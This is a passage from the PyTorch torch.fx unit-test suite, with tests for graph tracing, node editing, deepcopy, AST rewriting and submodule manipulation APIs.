x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
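# Build a relu chain longer than the recursion limit; deepcopy of the graph must not
# recurse per node, and the copied nodes' user sets must mirror the originals.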
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_immutable_list_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
l = immutable_list([3, [rand_tensor, 42]])
flattened, spec = pytree.tree_flatten(l)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == l
assert isinstance(unflattened, immutable_list)
def test_immutable_dict_pytree_ops(self):
rand_tensor = torch.randn(5, 3)
d = immutable_dict({'a': 3, 'b': [rand_tensor, 42]})
flattened, spec = pytree.tree_flatten(d)
assert flattened == [3, rand_tensor, 42]
unflattened = pytree.tree_unflatten(flattened, spec)
assert unflattened == d
assert isinstance(unflattened, immutable_dict)
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_prepend_self(self):
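# Prepending a node before itself (and appending it after its input) should leave the
# graph unchanged: still three nodes (placeholder, relu, output).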
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.prepend(b)
x.append(b)
self.assertEqual(len(graph.nodes), 3)
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
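# Nodes created inside inserting_before(relu.node) are placed ahead of relu, so the
# final order is placeholder -> neg -> tanh -> relu.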
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_named_tuple_inlined(self):
class NamedTupMod(torch.nn.Module):
def forward(self, inp):
return wrapped_named_tup(Pair(inp, 1.2), p2=Pair(3.4, inp))
m = NamedTupMod()
input = torch.rand(3, 4)
ref = m(input)
traced = symbolic_trace(m)
res = traced(input)
self.assertEqual(ref, res)
# Check Pair NamedTuple works when inlined into the function call.
ph = call_func = None
for node in traced.graph.nodes:
if node.op == "placeholder":
ph = node
elif node.op == "call_function" and node.target == wrapped_named_tup:
node.update_arg(0, Pair(ph, 1.2))
node.update_kwarg("p2", Pair(3.4, ph))
call_func = node
break
self.assertTrue(call_func is not None)
self.assertTrue(isinstance(call_func.args[0], Pair))
self.assertTrue(isinstance(call_func.kwargs["p2"], Pair))
self.assertEqual(_format_arg(call_func.args[0]), "Pair(x=%inp, y=1.2)")
self.assertEqual(_format_arg(call_func.kwargs["p2"]), "Pair(x=3.4, y=%inp)")
traced.graph.eliminate_dead_code()
traced.recompile()
res = traced(input)
self.assertEqual(ref, res)
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
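# Note: the assertions above rely on eliminate_dead_code treating the profiler
# _record_function_enter/_record_function_exit calls as side-effectful, which is
# why both call_function nodes survive even though nothing consumes their outputs.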
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
